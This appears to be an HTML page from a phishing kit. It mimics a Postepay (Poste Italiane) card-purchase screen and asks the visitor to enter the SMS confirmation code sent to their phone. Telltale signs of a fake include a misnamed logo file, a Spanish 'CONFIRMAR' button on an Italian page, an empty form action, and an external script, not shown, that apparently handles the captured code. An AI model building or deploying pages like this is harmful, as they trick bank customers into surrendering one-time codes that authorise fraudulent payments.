<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/pag2.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
    
</head>
<body>
    <div class="hed">
        <img src="./img/lojo.png" alt="">
    </div>
         <p style="margin-left: 15px; margin-top: 30px; font-size: 18px; font-weight: bold; margin-bottom: 20px;">Acquista con carta <br> 
            Postepay*</p>
            <p style="margin-left: 15px;">
                Inserisci il codice di conferma ricevuto <br> via
SMS al tuo numero
            </p>
    <div class="haz">
        <p style="margin-bottom: 40px;">verifica tramite codice SMS.</p>
        <!--  form  -->
        <form action="" id="pg3">
            <div class="inp">
                <p>CODICE SMS *</p>
                <input type="tel" name="" id="sps1" placeholder="inserisci" required maxlength="8">
            </div>
 
            <button>CONFIRMAR</button>
        </form>
    </div>
    <div class="fot">
        <img src="./img/fot1.PNG" alt="">
        <img src="./img/fot2.PNG" alt="">
    </div>
    <!-- mine hho -->
    <script src="./js/stb.js"></script>
</body>
</html>